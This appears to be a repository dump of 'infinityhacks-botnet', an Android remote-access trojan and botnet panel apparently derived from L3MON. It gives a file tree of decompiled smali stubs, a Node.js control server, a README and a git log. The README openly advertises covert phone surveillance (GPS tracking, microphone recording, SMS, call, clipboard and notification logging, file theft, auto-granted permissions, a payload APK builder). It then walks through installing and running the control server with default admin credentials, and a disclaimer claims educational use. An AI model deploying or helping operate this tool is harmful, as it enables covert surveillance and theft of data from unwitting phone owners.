======================: FILES :======================
infinityhacks-botnet
├── app
│   └── factory
│       ├── apktool.jar
│       ├── base.apk
│       ├── decompiled
│       │   ├── AndroidManifest.xml
│       │   ├── apktool.yml
│       │   ├── build
│       │   │   └── apk
│       │   │       ├── AndroidManifest.xml
│       │   │       ├── classes.dex
│       │   │       ├── res
│       │   │       │   ├── layout
│       │   │       │   │   └── activity_main.xml
│       │   │       │   ├── layout-v17
│       │   │       │   │   └── activity_main.xml
│       │   │       │   ├── mipmap-hdpi
│       │   │       │   │   └── ic_launcher.png
│       │   │       │   ├── mipmap-mdpi
│       │   │       │   │   └── ic_launcher.png
│       │   │       │   ├── mipmap-xhdpi
│       │   │       │   │   └── ic_launcher.png
│       │   │       │   ├── mipmap-xxhdpi
│       │   │       │   │   └── ic_launcher.png
│       │   │       │   └── mipmap-xxxhdpi
│       │   │       │       └── ic_launcher.png
│       │   │       └── resources.arsc
│       │   ├── original
│       │   │   ├── AndroidManifest.xml
│       │   │   └── META-INF
│       │   │       ├── CERT.RSA
│       │   │       ├── CERT.SF
│       │   │       └── MANIFEST.MF
│       │   ├── res
│       │   │   ├── layout
│       │   │   │   └── activity_main.xml
│       │   │   ├── layout-v17
│       │   │   │   └── activity_main.xml
│       │   │   ├── mipmap-hdpi
│       │   │   │   └── ic_launcher.png
│       │   │   ├── mipmap-mdpi
│       │   │   │   └── ic_launcher.png
│       │   │   ├── mipmap-xhdpi
│       │   │   │   └── ic_launcher.png
│       │   │   ├── mipmap-xxhdpi
│       │   │   │   └── ic_launcher.png
│       │   │   ├── mipmap-xxxhdpi
│       │   │   │   └── ic_launcher.png
│       │   │   ├── values
│       │   │   │   ├── colors.xml
│       │   │   │   ├── dimens.xml
│       │   │   │   ├── ids.xml
│       │   │   │   ├── public.xml
│       │   │   │   ├── strings.xml
│       │   │   │   └── styles.xml
│       │   │   └── values-w820dp-v13
│       │   │       └── dimens.xml
│       │   └── smali
│       │       ├── com
│       │       │   ├── etechd
│       │       │   │   └── l3mon
│       │       │   │       ├── AppInstaller.smali
│       │       │   │       ├── AppList.smali
│       │       │   │       ├── BuildConfig.smali
│       │       │   │       ├── CallsManager.smali
│       │       │   │       ├── CameraManager$1.smali
│       │       │   │       ├── CameraManager.smali
│       │       │   │       ├── ConnectionManager$1.smali
│       │       │   │       ├── ConnectionManager$2.smali
│       │       │   │       ├── ConnectionManager.smali
│       │       │   │       ├── ContactsManager.smali
│       │       │   │       ├── FileManager.smali
│       │       │   │       ├── IOSocket.smali
│       │       │   │       ├── LocManager.smali
│       │       │   │       ├── MainActivity.smali
│       │       │   │       ├── MainService$1.smali
│       │       │   │       ├── MainService.smali
│       │       │   │       ├── MicManager$1.smali
│       │       │   │       ├── MicManager.smali
│       │       │   │       ├── MyReceiver.smali
│       │       │   │       ├── NotificationListener.smali
│       │       │   │       ├── PermissionManager.smali
│       │       │   │       ├── R$color.smali
│       │       │   │       ├── R$dimen.smali
│       │       │   │       ├── R$id.smali
│       │       │   │       ├── R$layout.smali
│       │       │   │       ├── R$mipmap.smali
│       │       │   │       ├── R$string.smali
│       │       │   │       ├── R$style.smali
│       │       │   │       ├── R.smali
│       │       │   │       ├── ServiceReciever.smali
│       │       │   │       ├── SMSManager.smali
│       │       │   │       └── WifiScanner.smali
│       │       │   └── infinityhacks
│       │       │       └── services
│       │       │           ├── AppInstaller.smali
│       │       │           ├── AppList.smali
│       │       │           ├── BuildConfig.smali
│       │       │           ├── CallsManager.smali
│       │       │           ├── CameraManager$1.smali
│       │       │           ├── CameraManager.smali
│       │       │           ├── ConnectionManager$1.smali
│       │       │           ├── ConnectionManager$2.smali
│       │       │           ├── ConnectionManager.smali
│       │       │           ├── ContactsManager.smali
│       │       │           ├── FileManager.smali
│       │       │           ├── IOSocket.smali
│       │       │           ├── LocManager.smali
│       │       │           ├── MainActivity.smali
│       │       │           ├── MainService$1.smali
│       │       │           ├── MainService.smali
│       │       │           ├── MicManager$1.smali
│       │       │           ├── MicManager.smali
│       │       │           ├── MyReceiver.smali
│       │       │           ├── NotificationListener.smali
│       │       │           ├── PermissionManager.smali
│       │       │           ├── R$color.smali
│       │       │           ├── R$dimen.smali
│       │       │           ├── R$id.smali
│       │       │           ├── R$layout.smali
│       │       │           ├── R$mipmap.smali
│       │       │           ├── R$string.smali
│       │       │           ├── R$style.smali
│       │       │           ├── R.smali
│       │       │           ├── ServiceReciever.smali
│       │       │           ├── SMSManager.smali
│       │       │           └── WifiScanner.smali
│       │       ├── io
│       │       │   └── socket
│       │       │       ├── backo
│       │       │       │   └── Backoff.smali
│       │       │       ├── client
│       │       │       │   ├── Ack.smali
│       │       │       │   ├── IO$Options.smali
│       │       │       │   ├── IO.smali
│       │       │       │   ├── Manager$1$1.smali
│       │       │       │   ├── Manager$1$2.smali
│       │       │       │   ├── Manager$1$3.smali
│       │       │       │   ├── Manager$1$4$1.smali
│       │       │       │   ├── Manager$1$4.smali
│       │       │       │   ├── Manager$1$5.smali
│       │       │       │   ├── Manager$10.smali
│       │       │       │   ├── Manager$11$1$1.smali
│       │       │       │   ├── Manager$11$1.smali
│       │       │       │   ├── Manager$11.smali
│       │       │       │   ├── Manager$12.smali
│       │       │       │   ├── Manager$1.smali
│       │       │       │   ├── Manager$2.smali
│       │       │       │   ├── Manager$3.smali
│       │       │       │   ├── Manager$4.smali
│       │       │       │   ├── Manager$5.smali
│       │       │       │   ├── Manager$6.smali
│       │       │       │   ├── Manager$7.smali
│       │       │       │   ├── Manager$8.smali
│       │       │       │   ├── Manager$9.smali
│       │       │       │   ├── Manager$Engine.smali
│       │       │       │   ├── Manager$OpenCallback.smali
│       │       │       │   ├── Manager$Options.smali
│       │       │       │   ├── Manager$ReadyState.smali
│       │       │       │   ├── Manager.smali
│       │       │       │   ├── On$1.smali
│       │       │       │   ├── On$Handle.smali
│       │       │       │   ├── On.smali
│       │       │       │   ├── Socket$1.smali
│       │       │       │   ├── Socket$2$1.smali
│       │       │       │   ├── Socket$2$2.smali
│       │       │       │   ├── Socket$2$3.smali
│       │       │       │   ├── Socket$2.smali
│       │       │       │   ├── Socket$3.smali
│       │       │       │   ├── Socket$4.smali
│       │       │       │   ├── Socket$5.smali
│       │       │       │   ├── Socket$6$1.smali
│       │       │       │   ├── Socket$6.smali
│       │       │       │   ├── Socket$7$1.smali
│       │       │       │   ├── Socket$7.smali
│       │       │       │   ├── Socket$8.smali
│       │       │       │   ├── SocketIOException.smali
│       │       │       │   ├── Socket.smali
│       │       │       │   └── Url.smali
│       │       │       ├── emitter
│       │       │       │   ├── Emitter$Listener.smali
│       │       │       │   ├── Emitter$OnceListener.smali
│       │       │       │   └── Emitter.smali
│       │       │       ├── engineio
│       │       │       │   ├── client
│       │       │       │   │   ├── EngineIOException.smali
│       │       │       │   │   ├── HandshakeData.smali
│       │       │       │   │   ├── Socket$10.smali
│       │       │       │   │   ├── Socket$11.smali
│       │       │       │   │   ├── Socket$12.smali
│       │       │       │   │   ├── Socket$13.smali
│       │       │       │   │   ├── Socket$14$1.smali
│       │       │       │   │   ├── Socket$14.smali
│       │       │       │   │   ├── Socket$15$1.smali
│       │       │       │   │   ├── Socket$15.smali
│       │       │       │   │   ├── Socket$16$1.smali
│       │       │       │   │   ├── Socket$16.smali
│       │       │       │   │   ├── Socket$17.smali
│       │       │       │   │   ├── Socket$18.smali
│       │       │       │   │   ├── Socket$19.smali
│       │       │       │   │   ├── Socket$1.smali
│       │       │       │   │   ├── Socket$2$1.smali
│       │       │       │   │   ├── Socket$20$1.smali
│       │       │       │   │   ├── Socket$20$2.smali
│       │       │       │   │   ├── Socket$20$3.smali
│       │       │       │   │   ├── Socket$20$4.smali
│       │       │       │   │   ├── Socket$20.smali
│       │       │       │   │   ├── Socket$2.smali
│       │       │       │   │   ├── Socket$3.smali
│       │       │       │   │   ├── Socket$4.smali
│       │       │       │   │   ├── Socket$5.smali
│       │       │       │   │   ├── Socket$6.smali
│       │       │       │   │   ├── Socket$7$1$1.smali
│       │       │       │   │   ├── Socket$7$1.smali
│       │       │       │   │   ├── Socket$7.smali
│       │       │       │   │   ├── Socket$8.smali
│       │       │       │   │   ├── Socket$9.smali
│       │       │       │   │   ├── Socket$Options.smali
│       │       │       │   │   ├── Socket$ReadyState.smali
│       │       │       │   │   ├── Socket.smali
│       │       │       │   │   ├── Transport$1.smali
│       │       │       │   │   ├── Transport$2.smali
│       │       │       │   │   ├── Transport$3.smali
│       │       │       │   │   ├── Transport$Options.smali
│       │       │       │   │   ├── Transport$ReadyState.smali
│       │       │       │   │   ├── transports
│       │       │       │   │   │   ├── Polling$1$1.smali
│       │       │       │   │   │   ├── Polling$1$2.smali
│       │       │       │   │   │   ├── Polling$1$3.smali
│       │       │       │   │   │   ├── Polling$1.smali
│       │       │       │   │   │   ├── Polling$2.smali
│       │       │       │   │   │   ├── Polling$3.smali
│       │       │       │   │   │   ├── Polling$4.smali
│       │       │       │   │   │   ├── Polling$5.smali
│       │       │       │   │   │   ├── Polling.smali
│       │       │       │   │   │   ├── PollingXHR$1$1.smali
│       │       │       │   │   │   ├── PollingXHR$1.smali
│       │       │       │   │   │   ├── PollingXHR$2.smali
│       │       │       │   │   │   ├── PollingXHR$3$1.smali
│       │       │       │   │   │   ├── PollingXHR$3.smali
│       │       │       │   │   │   ├── PollingXHR$4$1.smali
│       │       │       │   │   │   ├── PollingXHR$4.smali
│       │       │       │   │   │   ├── PollingXHR$5$1.smali
│       │       │       │   │   │   ├── PollingXHR$5.smali
│       │       │       │   │   │   ├── PollingXHR$6$1.smali
│       │       │       │   │   │   ├── PollingXHR$6.smali
│       │       │       │   │   │   ├── PollingXHR$Request$1.smali
│       │       │       │   │   │   ├── PollingXHR$Request$Options.smali
│       │       │       │   │   │   ├── PollingXHR$Request.smali
│       │       │       │   │   │   ├── PollingXHR.smali
│       │       │       │   │   │   ├── WebSocket$1.smali
│       │       │       │   │   │   ├── WebSocket$2$1.smali
│       │       │       │   │   │   ├── WebSocket$2$2.smali
│       │       │       │   │   │   ├── WebSocket$2$3.smali
│       │       │       │   │   │   ├── WebSocket$2$4.smali
│       │       │       │   │   │   ├── WebSocket$2$5.smali
│       │       │       │   │   │   ├── WebSocket$2.smali
│       │       │       │   │   │   ├── WebSocket$3$1.smali
│       │       │       │   │   │   ├── WebSocket$3.smali
│       │       │       │   │   │   ├── WebSocket$4.smali
│       │       │       │   │   │   └── WebSocket.smali
│       │       │       │   │   └── Transport.smali
│       │       │       │   └── parser
│       │       │       │       ├── Buffer.smali
│       │       │       │       ├── Packet.smali
│       │       │       │       ├── Parser$1.smali
│       │       │       │       ├── Parser$2.smali
│       │       │       │       ├── Parser$DecodePayloadCallback.smali
│       │       │       │       ├── Parser$EncodeCallback.smali
│       │       │       │       └── Parser.smali
│       │       │       ├── global
│       │       │       │   └── Global.smali
│       │       │       ├── hasbinary
│       │       │       │   └── HasBinary.smali
│       │       │       ├── parseqs
│       │       │       │   └── ParseQS.smali
│       │       │       ├── parser
│       │       │       │   ├── Binary$DeconstructedPacket.smali
│       │       │       │   ├── Binary.smali
│       │       │       │   ├── Packet.smali
│       │       │       │   ├── Parser$BinaryReconstructor.smali
│       │       │       │   ├── Parser$Decoder.smali
│       │       │       │   ├── Parser$Encoder$Callback.smali
│       │       │       │   ├── Parser$Encoder.smali
│       │       │       │   └── Parser.smali
│       │       │       ├── thread
│       │       │       │   ├── EventThread$1.smali
│       │       │       │   ├── EventThread$2.smali
│       │       │       │   └── EventThread.smali
│       │       │       ├── utf8
│       │       │       │   ├── UTF8Exception.smali
│       │       │       │   └── UTF8.smali
│       │       │       └── yeast
│       │       │           └── Yeast.smali
│       │       ├── okhttp3
│       │       │   ├── Address.smali
│       │       │   ├── Authenticator$1.smali
│       │       │   ├── Authenticator.smali
│       │       │   ├── Cache$1.smali
│       │       │   ├── Cache$2.smali
│       │       │   ├── Cache$CacheRequestImpl$1.smali
│       │       │   ├── Cache$CacheRequestImpl.smali
│       │       │   ├── Cache$CacheResponseBody$1.smali
│       │       │   ├── Cache$CacheResponseBody.smali
│       │       │   ├── Cache$Entry.smali
│       │       │   ├── CacheControl$Builder.smali
│       │       │   ├── CacheControl.smali
│       │       │   ├── Cache.smali
│       │       │   ├── Call$Factory.smali
│       │       │   ├── Callback.smali
│       │       │   ├── Call.smali
│       │       │   ├── CertificatePinner$Builder.smali
│       │       │   ├── CertificatePinner$Pin.smali
│       │       │   ├── CertificatePinner.smali
│       │       │   ├── Challenge.smali
│       │       │   ├── CipherSuite.smali
│       │       │   ├── ConnectionPool$1.smali
│       │       │   ├── ConnectionPool.smali
│       │       │   ├── Connection.smali
│       │       │   ├── ConnectionSpec$Builder.smali
│       │       │   ├── ConnectionSpec.smali
│       │       │   ├── Cookie$Builder.smali
│       │       │   ├── CookieJar$1.smali
│       │       │   ├── CookieJar.smali
│       │       │   ├── Cookie.smali
│       │       │   ├── Credentials.smali
│       │       │   ├── Dispatcher.smali
│       │       │   ├── Dns$1.smali
│       │       │   ├── Dns.smali
│       │       │   ├── FormBody$Builder.smali
│       │       │   ├── FormBody.smali
│       │       │   ├── Handshake.smali
│       │       │   ├── Headers$Builder.smali
│       │       │   ├── Headers.smali
│       │       │   ├── HttpUrl$1.smali
│       │       │   ├── HttpUrl$Builder$ParseResult.smali
│       │       │   ├── HttpUrl$Builder.smali
│       │       │   ├── HttpUrl.smali
│       │       │   ├── Interceptor$Chain.smali
│       │       │   ├── Interceptor.smali
│       │       │   ├── internal
│       │       │   │   ├── cache
│       │       │   │   │   ├── CacheInterceptor$1.smali
│       │       │   │   │   ├── CacheInterceptor.smali
│       │       │   │   │   ├── CacheRequest.smali
│       │       │   │   │   ├── CacheStrategy$Factory.smali
│       │       │   │   │   ├── CacheStrategy.smali
│       │       │   │   │   ├── DiskLruCache$1.smali
│       │       │   │   │   ├── DiskLruCache$2.smali
│       │       │   │   │   ├── DiskLruCache$3.smali
│       │       │   │   │   ├── DiskLruCache$Editor$1.smali
│       │       │   │   │   ├── DiskLruCache$Editor.smali
│       │       │   │   │   ├── DiskLruCache$Entry.smali
│       │       │   │   │   ├── DiskLruCache$Snapshot.smali
│       │       │   │   │   ├── DiskLruCache.smali
│       │       │   │   │   ├── FaultHidingSink.smali
│       │       │   │   │   └── InternalCache.smali
│       │       │   │   ├── cache2
│       │       │   │   │   ├── FileOperator.smali
│       │       │   │   │   ├── Relay$RelaySource.smali
│       │       │   │   │   └── Relay.smali
│       │       │   │   ├── connection
│       │       │   │   │   ├── ConnectInterceptor.smali
│       │       │   │   │   ├── ConnectionSpecSelector.smali
│       │       │   │   │   ├── RealConnection.smali
│       │       │   │   │   ├── RouteDatabase.smali
│       │       │   │   │   ├── RouteException.smali
│       │       │   │   │   ├── RouteSelector.smali
│       │       │   │   │   ├── StreamAllocation$StreamAllocationReference.smali
│       │       │   │   │   └── StreamAllocation.smali
│       │       │   │   ├── http
│       │       │   │   │   ├── BridgeInterceptor.smali
│       │       │   │   │   ├── CallServerInterceptor.smali
│       │       │   │   │   ├── HttpCodec.smali
│       │       │   │   │   ├── HttpDate$1.smali
│       │       │   │   │   ├── HttpDate.smali
│       │       │   │   │   ├── HttpHeaders.smali
│       │       │   │   │   ├── HttpMethod.smali
│       │       │   │   │   ├── RealInterceptorChain.smali
│       │       │   │   │   ├── RealResponseBody.smali
│       │       │   │   │   ├── RequestLine.smali
│       │       │   │   │   ├── RetryAndFollowUpInterceptor.smali
│       │       │   │   │   ├── StatusLine.smali
│       │       │   │   │   └── UnrepeatableRequestBody.smali
│       │       │   │   ├── http1
│       │       │   │   │   ├── Http1Codec$1.smali
│       │       │   │   │   ├── Http1Codec$AbstractSource.smali
│       │       │   │   │   ├── Http1Codec$ChunkedSink.smali
│       │       │   │   │   ├── Http1Codec$ChunkedSource.smali
│       │       │   │   │   ├── Http1Codec$FixedLengthSink.smali
│       │       │   │   │   ├── Http1Codec$FixedLengthSource.smali
│       │       │   │   │   ├── Http1Codec$UnknownLengthSource.smali
│       │       │   │   │   └── Http1Codec.smali
│       │       │   │   ├── http2
│       │       │   │   │   ├── ConnectionShutdownException.smali
│       │       │   │   │   ├── ErrorCode.smali
│       │       │   │   │   ├── Header.smali
│       │       │   │   │   ├── Hpack$Reader.smali
│       │       │   │   │   ├── Hpack$Writer.smali
│       │       │   │   │   ├── Hpack.smali
│       │       │   │   │   ├── Http2Codec$StreamFinishingSource.smali
│       │       │   │   │   ├── Http2Codec.smali
│       │       │   │   │   ├── Http2Connection$1.smali
│       │       │   │   │   ├── Http2Connection$2.smali
│       │       │   │   │   ├── Http2Connection$3.smali
│       │       │   │   │   ├── Http2Connection$4.smali
│       │       │   │   │   ├── Http2Connection$5.smali
│       │       │   │   │   ├── Http2Connection$6.smali
│       │       │   │   │   ├── Http2Connection$7.smali
│       │       │   │   │   ├── Http2Connection$Builder.smali
│       │       │   │   │   ├── Http2Connection$Listener$1.smali
│       │       │   │   │   ├── Http2Connection$Listener.smali
│       │       │   │   │   ├── Http2Connection$ReaderRunnable$1.smali
│       │       │   │   │   ├── Http2Connection$ReaderRunnable$2.smali
│       │       │   │   │   ├── Http2Connection$ReaderRunnable$3.smali
│       │       │   │   │   ├── Http2Connection$ReaderRunnable.smali
│       │       │   │   │   ├── Http2Connection.smali
│       │       │   │   │   ├── Http2Reader$ContinuationSource.smali
│       │       │   │   │   ├── Http2Reader$Handler.smali
│       │       │   │   │   ├── Http2Reader.smali
│       │       │   │   │   ├── Http2.smali
│       │       │   │   │   ├── Http2Stream$FramedDataSink.smali
│       │       │   │   │   ├── Http2Stream$FramedDataSource.smali
│       │       │   │   │   ├── Http2Stream$StreamTimeout.smali
│       │       │   │   │   ├── Http2Stream.smali
│       │       │   │   │   ├── Http2Writer.smali
│       │       │   │   │   ├── Huffman$Node.smali
│       │       │   │   │   ├── Huffman.smali
│       │       │   │   │   ├── Ping.smali
│       │       │   │   │   ├── PushObserver$1.smali
│       │       │   │   │   ├── PushObserver.smali
│       │       │   │   │   ├── Settings.smali
│       │       │   │   │   └── StreamResetException.smali
│       │       │   │   ├── Internal.smali
│       │       │   │   ├── io
│       │       │   │   │   ├── FileSystem$1.smali
│       │       │   │   │   └── FileSystem.smali
│       │       │   │   ├── NamedRunnable.smali
│       │       │   │   ├── platform
│       │       │   │   │   ├── AndroidPlatform$AndroidCertificateChainCleaner.smali
│       │       │   │   │   ├── AndroidPlatform$CloseGuard.smali
│       │       │   │   │   ├── AndroidPlatform.smali
│       │       │   │   │   ├── Jdk9Platform.smali
│       │       │   │   │   ├── JdkWithJettyBootPlatform$JettyNegoProvider.smali
│       │       │   │   │   ├── JdkWithJettyBootPlatform.smali
│       │       │   │   │   ├── OptionalMethod.smali
│       │       │   │   │   └── Platform.smali
│       │       │   │   ├── tls
│       │       │   │   │   ├── BasicCertificateChainCleaner.smali
│       │       │   │   │   ├── CertificateChainCleaner.smali
│       │       │   │   │   ├── DistinguishedNameParser.smali
│       │       │   │   │   ├── OkHostnameVerifier.smali
│       │       │   │   │   ├── TrustRootIndex$AndroidTrustRootIndex.smali
│       │       │   │   │   ├── TrustRootIndex$BasicTrustRootIndex.smali
│       │       │   │   │   └── TrustRootIndex.smali
│       │       │   │   ├── Util$1.smali
│       │       │   │   ├── Util.smali
│       │       │   │   ├── Version.smali
│       │       │   │   └── ws
│       │       │   │       ├── RealWebSocket$1.smali
│       │       │   │       ├── RealWebSocket$2.smali
│       │       │   │       ├── RealWebSocket$CancelRunnable.smali
│       │       │   │       ├── RealWebSocket$ClientStreams.smali
│       │       │   │       ├── RealWebSocket$Close.smali
│       │       │   │       ├── RealWebSocket$Message.smali
│       │       │   │       ├── RealWebSocket$PingRunnable.smali
│       │       │   │       ├── RealWebSocket$Streams.smali
│       │       │   │       ├── RealWebSocket.smali
│       │       │   │       ├── WebSocketProtocol.smali
│       │       │   │       ├── WebSocketReader$FrameCallback.smali
│       │       │   │       ├── WebSocketReader.smali
│       │       │   │       ├── WebSocketWriter$FrameSink.smali
│       │       │   │       └── WebSocketWriter.smali
│       │       │   ├── MediaType.smali
│       │       │   ├── MultipartBody$Builder.smali
│       │       │   ├── MultipartBody$Part.smali
│       │       │   ├── MultipartBody.smali
│       │       │   ├── OkHttpClient$1.smali
│       │       │   ├── OkHttpClient$Builder.smali
│       │       │   ├── OkHttpClient.smali
│       │       │   ├── Protocol.smali
│       │       │   ├── RealCall$AsyncCall.smali
│       │       │   ├── RealCall.smali
│       │       │   ├── Request$Builder.smali
│       │       │   ├── RequestBody$1.smali
│       │       │   ├── RequestBody$2.smali
│       │       │   ├── RequestBody$3.smali
│       │       │   ├── RequestBody.smali
│       │       │   ├── Request.smali
│       │       │   ├── Response$Builder.smali
│       │       │   ├── ResponseBody$1.smali
│       │       │   ├── ResponseBody$BomAwareReader.smali
│       │       │   ├── ResponseBody.smali
│       │       │   ├── Response.smali
│       │       │   ├── Route.smali
│       │       │   ├── TlsVersion.smali
│       │       │   ├── WebSocket$Factory.smali
│       │       │   ├── WebSocketListener.smali
│       │       │   └── WebSocket.smali
│       │       └── okio
│       │           ├── AsyncTimeout$1.smali
│       │           ├── AsyncTimeout$2.smali
│       │           ├── AsyncTimeout$Watchdog.smali
│       │           ├── AsyncTimeout.smali
│       │           ├── Base64.smali
│       │           ├── Buffer$1.smali
│       │           ├── Buffer$2.smali
│       │           ├── BufferedSink.smali
│       │           ├── BufferedSource.smali
│       │           ├── Buffer.smali
│       │           ├── ByteString.smali
│       │           ├── DeflaterSink.smali
│       │           ├── ForwardingSink.smali
│       │           ├── ForwardingSource.smali
│       │           ├── ForwardingTimeout.smali
│       │           ├── GzipSink.smali
│       │           ├── GzipSource.smali
│       │           ├── HashingSink.smali
│       │           ├── HashingSource.smali
│       │           ├── InflaterSource.smali
│       │           ├── Okio$1.smali
│       │           ├── Okio$2.smali
│       │           ├── Okio$3.smali
│       │           ├── Okio$4.smali
│       │           ├── Okio.smali
│       │           ├── Options.smali
│       │           ├── Pipe$PipeSink.smali
│       │           ├── Pipe$PipeSource.smali
│       │           ├── Pipe.smali
│       │           ├── RealBufferedSink$1.smali
│       │           ├── RealBufferedSink.smali
│       │           ├── RealBufferedSource$1.smali
│       │           ├── RealBufferedSource.smali
│       │           ├── SegmentedByteString.smali
│       │           ├── SegmentPool.smali
│       │           ├── Segment.smali
│       │           ├── Sink.smali
│       │           ├── Source.smali
│       │           ├── Timeout$1.smali
│       │           ├── Timeout.smali
│       │           └── Util.smali
│       ├── sign.jar
│       ├── testkey.pk8
│       └── testkey.x509.pem
├── assets
│   ├── views
│   │   ├── builder.ejs
│   │   ├── deviceManager.ejs
│   │   ├── deviceManagerPages
│   │   │   ├── apps.ejs
│   │   │   ├── call_log.ejs
│   │   │   ├── clipboard_log.ejs
│   │   │   ├── contacts.ejs
│   │   │   ├── deviceNotFound.ejs
│   │   │   ├── downloads.ejs
│   │   │   ├── file_manager.ejs
│   │   │   ├── gps.ejs
│   │   │   ├── info.ejs
│   │   │   ├── microphone.ejs
│   │   │   ├── noPage.ejs
│   │   │   ├── notification_log.ejs
│   │   │   ├── permissions.ejs
│   │   │   ├── sms_manager.ejs
│   │   │   └── wifi_manager.ejs
│   │   ├── index.ejs
│   │   ├── login.ejs
│   │   ├── logs.ejs
│   │   └── partials
│   │       ├── deviceManagerMenu.ejs
│   │       ├── footer.ejs
│   │       ├── head.ejs
│   │       └── header.ejs
│   └── webpublic
│       ├── build.s.apk
│       ├── client_downloads
│       │   └── blank
│       ├── css
│       │   ├── custom.css
│       │   ├── custom.css.map
│       │   ├── custom.scss
│       │   ├── images
│       │   │   ├── layers-2x.png
│       │   │   ├── layers.png
│       │   │   ├── marker-icon-2x.png
│       │   │   ├── marker-icon.png
│       │   │   └── marker-shadow.png
│       │   ├── leaflet.css
│       │   ├── semantic.min.css
│       │   ├── snackbar.min.css
│       │   └── themes
│       │       └── default
│       │           └── assets
│       │               ├── fonts
│       │               │   ├── brand-icons.eot
│       │               │   ├── brand-icons.svg
│       │               │   ├── brand-icons.ttf
│       │               │   ├── brand-icons.woff
│       │               │   ├── brand-icons.woff2
│       │               │   ├── icons.eot
│       │               │   ├── icons.otf
│       │               │   ├── icons.svg
│       │               │   ├── icons.ttf
│       │               │   ├── icons.woff
│       │               │   ├── icons.woff2
│       │               │   ├── outline-icons.eot
│       │               │   ├── outline-icons.svg
│       │               │   ├── outline-icons.ttf
│       │               │   ├── outline-icons.woff
│       │               │   └── outline-icons.woff2
│       │               └── images
│       │                   └── flags.png
│       ├── js
│       │   ├── jquery-3.4.1.min.js
│       │   ├── leaflet.js
│       │   ├── main.js
│       │   ├── semantic.min.js
│       │   └── snackbar.min.js
│       └── logo.png
├── clientData
│   └── blank
├── includes
│   ├── apkBuilder.js
│   ├── clientManager.js
│   ├── const.js
│   ├── databaseGateway.js
│   ├── expressRoutes.js
│   └── logManager.js
├── index.js
├── maindb.json
├── package.json
├── package-lock.json
├── Password.txt
└── README.md

76 directories, 557 files
======================: README CONTENT :======================
<p align="center">
<img src="https://github.com/ExtremeHacking/infinityhacks-botnet/blob/master/assets/webpublic/logo.png" height="60"><br>
A cloud based remote android managment suite, powered by NodeJS
</p>



## Features
- GPS Logging
- Microphone Recording
- View Contacts
- SMS Logs
- Send SMS
- Call Logs
- View Installed Apps
- View Stub Permissions
- Live Clipboard Logging
- Live Notification Logging
- View WiFi Networks (logs previously seen)
- File Explorer & Downloader
- Command Queuing
- Built In APK Builder
- Auto Allow Permission

## Prerequisites 
 - Java Runtime Environment 8
    - See [installation](#Installation) for OS specifics
 - NodeJs 
 - A Server

## Installation 
1. Install JRE 8 
    - Debian, Ubuntu, Etc
        - `sudo apt-get install openjdk-8-jre`
    - Fedora, Oracle, Red Hat, etc
        -  `su -c "yum install java-1.8.0-openjdk"`
    - Windows 
        - click [HERE](https://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html) for downloads

2. Install NodeJS [Instructions Here](https://nodejs.org/en/download/package-manager/) (If you can't figure this out, you shouldn't really be using this)

3. install PM2 
    - `npm install pm2 -g`

4. Download and Extract [HERE](https://codeload.github.com/ExtremeHacking/infinityhacks-botnet/zip/master)

5. In the extracted folder, run these commands
    - `npm install` <- install dependencies
    - `pm2 start index.js` <-- start the script
    - `pm2 startup` <- to run botnet on startup

6. Default Username & Password
    - Username: admin
    - Password: admin
    
7. Set Username & Password Manually  
    1. Stop botnet `pm2 stop index`
    2. Open `maindb.json` in a text editor
    3. under `admin` 
        - set the `username` as plain text
        - set the `password` as a LOWERCASE MD5 hash
    4. save the file
    5. run `pm2 restart all`

8. in your browser navigate to `http://<SERVER IP>:22533`
    
It's recommended to run botnet behind a reverse proxy such as [NGINX](https://www.nginx.com/resources/wiki/start/topics/tutorials/install/)

## Watch Practical Video
https://www.youtube.com/watch?v=Q8tej2ey33c

## Disclaimer
<b>Infinityhacks Botnet Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool.<br>
Infinityhacks Botnet is built for both Educational and Internal use ONLY.</b>

<br>
<p align="center">Made By <a href="//infinityhacks.net">Prashant Asoliya</a></p>     
<p align="center" style="font-size: 8px">v1.1.0</p>

Inspired by L3MON (https://github.com/D3VL/L3MON)
====================== GIT HISTORY: ======================
2f341fb HEAD@{0}: clone: from https://github.com/05t3/infinityhacks-botnet
commit 2f341fb69fa20173ca378f121bfb61854055b195
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 18:28:36 2020 +0530

    Update README.md

commit 014f915ef93ac0b64a7e0b560bd7b68df3cb7bf3
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 18:27:27 2020 +0530

    Update README.md

commit 2a2015817232b7b98ed3e62053cdc7d7bf8df358
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 03:11:08 2020 +0530

    infinityhacks

commit b37e6af92da543853027aa1cd4bc15f3d576eb6c
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 02:05:27 2020 +0530

    Update README.md

commit afb7e310d7b7a6b7a8ec2d5743533bf580bd0ec6
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 02:04:29 2020 +0530

    Update README.md

commit 96384ca769fbf3606855c5f40f1cf983aeb5e054
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 02:03:06 2020 +0530

    Update README.md

commit e9952414d7d63889ee289c7a2034593efc4ebea3
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 01:57:49 2020 +0530

    Update README.md

commit 6cfd8764a8e24e0fd51548c5d54a2f77730e2c82
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 01:56:56 2020 +0530

    Update README.md

commit 04fef373a870f070e4ce3cfb3fc543fec52c670c
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 01:53:31 2020 +0530

    Update README.md

commit a8299eabe43937532398a6801dd4b49e5bb3f6f3
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 01:52:13 2020 +0530

    Update README.md

commit 7cd002e8dfd60a0e64abd07722f7457bb73cb869
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 01:51:46 2020 +0530

    Update README.md

commit e46a1770ccc5983ac661724cec611b629d540898
Author: Extreme Hacking <62741019+ExtremeHacking@users.noreply.github.com>
Date:   Sun Mar 29 01:49:09 2020 +0530

    Update README.md

commit fe9456a73f9923d4f89fd6627eb115379d8f71e4
